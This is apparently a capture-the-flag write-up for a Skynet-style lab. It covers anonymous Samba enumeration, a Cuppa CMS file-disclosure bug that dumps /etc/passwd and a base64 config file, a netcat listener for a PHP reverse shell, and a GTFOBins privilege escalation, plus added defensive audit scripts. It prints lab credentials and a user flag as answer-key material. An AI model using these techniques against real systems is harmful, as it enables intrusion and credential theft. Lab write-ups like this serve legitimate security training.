I then realized I would have to go down this route first. Looking back at the nmap scan, port 445 appears to be Samba. Using enum4linux, I saw the following shares:
There seems to be read access to the anonymous share. Using smbclient, I was able to see a couple of files:
There was also a directory called logs:
I downloaded all of those files to my local machine using "mget *". I viewed all of the downloaded files.
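The root cause of that first foothold is a share that Samba serves to unauthenticated clients. As an added example that is not part of the original write-up, the script below audits an smb.conf for shares readable without credentials and produces a hardened copy. The configuration text is constructed to resemble the misconfiguration described above (a guest-readable share called anonymous next to a locked-down one); it is not the target's real smb.conf.

```python
"""Audit a Samba smb.conf for shares reachable without credentials.

Added example, not part of the original write-up. SAMPLE_SMB_CONF is
constructed to look like the misconfiguration that exposed the
'anonymous' share; it is not the target's real configuration.
"""
import configparser

# Constructed sample: one guest-readable share beside a properly locked one.
SAMPLE_SMB_CONF = """
[global]
workgroup = WORKGROUP
map to guest = Bad User

[anonymous]
path = /srv/samba/anonymous
browseable = yes
guest ok = yes
read only = yes

[milesdyson]
path = /home/milesdyson/share
valid users = milesdyson
guest ok = no
read only = no
"""

TRUE_VALUES = {"yes", "true", "1"}
# Sections that are not user data shares and are skipped by the audit.
SKIP_SECTIONS = {"global", "printers", "print$"}


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {key: value}} (keys lower-cased)."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    return {name: dict(cp[name]) for name in cp.sections()}


def is_true(value):
    """Samba accepts yes/true/1 as boolean true."""
    return value is not None and value.strip().lower() in TRUE_VALUES


def guest_readable_shares(text):
    """Return (share names with guest access, whether failed logins map to guest).

    'map to guest = Bad User' turns any failed login into the guest account,
    so every share with 'guest ok = yes' (or its synonym 'public') is
    readable by anyone who can reach port 445.
    """
    conf = parse_smb_conf(text)
    map_to_guest = conf.get("global", {}).get("map to guest", "Never")
    maps_bad_user = map_to_guest.strip().lower() == "bad user"
    findings = [
        share for share, opts in conf.items()
        if share not in SKIP_SECTIONS
        and (is_true(opts.get("guest ok")) or is_true(opts.get("public")))
    ]
    return findings, maps_bad_user


def harden(text):
    """Return the config with guest access switched off on every share."""
    out = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        name = key.strip().lower()
        if sep and name in ("guest ok", "public") and is_true(value):
            line = f"{key.rstrip()} = no"
        elif sep and name == "map to guest":
            line = f"{key.rstrip()} = Never"  # failed logins stay failed
        out.append(line)
    return "\n".join(out)


if __name__ == "__main__":
    print("guest-readable shares:", guest_readable_shares(SAMPLE_SMB_CONF))
    print("after hardening:", guest_readable_shares(harden(SAMPLE_SMB_CONF)))
```

Running the audit against a real server's smb.conf (usually /etc/samba/smb.conf) is the quickest way to confirm that no share still advertises guest ok = yes once it has been cleaned up; testparm -s will show the effective values if the file uses includes.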
The log files seemed to contain passwords. I went back to the mail site and entered the username milesdyson and password cyborg007haloterminator and I got in:
What is Miles password for his emails? cyborg007haloterminator
There also seems to be another user here, serenakogan. I kept that in my notes for future reference. The email from skynet@skynet seemed to have some interesting information in it:
Using that password, I was able to log into miles' samba share:
In the notes directory, I found a file called important.txt, which contained the following information:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
...but not something too helpful. I tried this for /etc/shadow as well, but it did not seem to work. I then viewed the exploit once more and tried running the following:
If you decode the whole string using Base64, you get the following:
<?php
class Configuration {
    public $host = "localhost";
    public $db = "cuppa";
    public $user = "root";
    public $password = "password123";
    public $table_prefix = "cu_";
    public $administrator_template = "default";
    public $list_limit = 25;
    public $token = "OBqIPqlFWf3X";
    public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
    public $upload_default_path = "media/uploadsFiles";
    public $maximum_file_size = "5242880";
    public $secure_login = 0;
    public $secure_login_value = "";
    public $secure_login_redirect = "";
}
?>
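Both files that the disclosure bug returned (the /etc/passwd listing and the base64-encoded Configuration.php) are worth triaging the way an assessor writing the report would. The script below is an added example, not part of the original write-up: it lists the accounts in /etc/passwd that have a real login shell, decodes the base64 blob back to PHP, extracts the public properties of the Configuration class, and flags the hardcoded password and token plus the fact that the web application connects to MySQL as root. The passwd rows are an abridged copy of the listing above and the base64 string is rebuilt locally so the script runs offline.

```python
"""Triage the files recovered through the Cuppa CMS file-disclosure bug.

Added example, not part of the original write-up. PASSWD_LISTING is an
abridged copy of the /etc/passwd rows shown above and CONFIGURATION_PHP is
the decoded Configuration.php; the base64 string is rebuilt here so the
script runs offline instead of touching the target.
"""
import base64
import re

# Abridged /etc/passwd rows from the disclosure (constructed subset).
PASSWD_LISTING = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
"""

# Decoded Configuration.php as shown in the write-up (long settings omitted).
CONFIGURATION_PHP = """<?php
class Configuration {
    public $host = "localhost";
    public $db = "cuppa";
    public $user = "root";
    public $password = "password123";
    public $table_prefix = "cu_";
    public $list_limit = 25;
    public $token = "OBqIPqlFWf3X";
    public $secure_login = 0;
    public $secure_login_value = "";
}
?>
"""

# The disclosure returns the file base64-encoded; re-encode locally for the demo.
CONFIGURATION_B64 = base64.b64encode(CONFIGURATION_PHP.encode()).decode()

# Shells that cannot start an interactive session.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def interactive_accounts(passwd_text):
    """Return accounts whose login shell allows an interactive session."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed rows
        user, _, uid, _, _, home, shell = fields
        if shell not in NON_LOGIN_SHELLS:
            found.append({"user": user, "uid": int(uid), "home": home, "shell": shell})
    return found


def decode_php_config(b64_text):
    """Decode the base64 blob the disclosure returned back into PHP source."""
    return base64.b64decode(b64_text).decode()


# Matches 'public $name = "string";' or 'public $name = 123;'
_PHP_PROP = re.compile(r'public\s+\$(\w+)\s*=\s*(?:"([^"]*)"|(\d+))\s*;')


def parse_php_config(php_text):
    """Pull the public properties into a dict with str or int values."""
    config = {}
    for name, string_val, int_val in _PHP_PROP.findall(php_text):
        config[name] = int(int_val) if int_val else string_val
    return config


def config_findings(config):
    """Report hardcoded credentials and risky settings found in the config."""
    findings = {}
    for name, value in config.items():
        if re.search(r"password|token|secret", name, re.I) and value:
            findings[name] = value  # secret stored in a file under the webroot
    if config.get("user") == "root":
        findings["db_user_is_root"] = True  # web app holds DBA-level credentials
    return findings


def triage(passwd_text, config_b64):
    """Summarise what the two disclosed files hand over, for the report."""
    config = parse_php_config(decode_php_config(config_b64))
    return {
        "interactive_users": [a["user"] for a in interactive_accounts(passwd_text)],
        "config_findings": config_findings(config),
    }


if __name__ == "__main__":
    from pprint import pprint
    pprint(triage(PASSWD_LISTING, CONFIGURATION_B64))
```

The interactive-shell check is what turns a long /etc/passwd dump into a short list of accounts worth caring about (here root and milesdyson), and the config findings are the items a remediation ticket would name: rotate the database password and token, and give the application its own MySQL user with privileges limited to the cuppa database.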
Here, we can see the username and password. I looked back at the nmap scan and realized that port 22 (SSH) is open. Maybe this was a password for that. It was not. After being stuck for a while, I viewed the write-up here and realized that I had to access the file using the URL. For that, I found the php-reverse-shell file and edited the IP address and port number. I then ran two commands in two different terminals:
python -m SimpleHTTPServer 80    # to serve the file to the Cuppa CMS
nc -lvnp 1234                    # to get the reverse connection
What is the user flag? 7ce5c2109a40f958099283600a9ae807
I then had the user file. I then had to get the root file. I referenced the same write-up mentioned above to see what they did for this. The author ends up using https://gtfobins.github.io/gtfobins/tar/#shell in order to get a root shell. I was again lost, and ended up finding the write-up at this page, and they ran the following commands: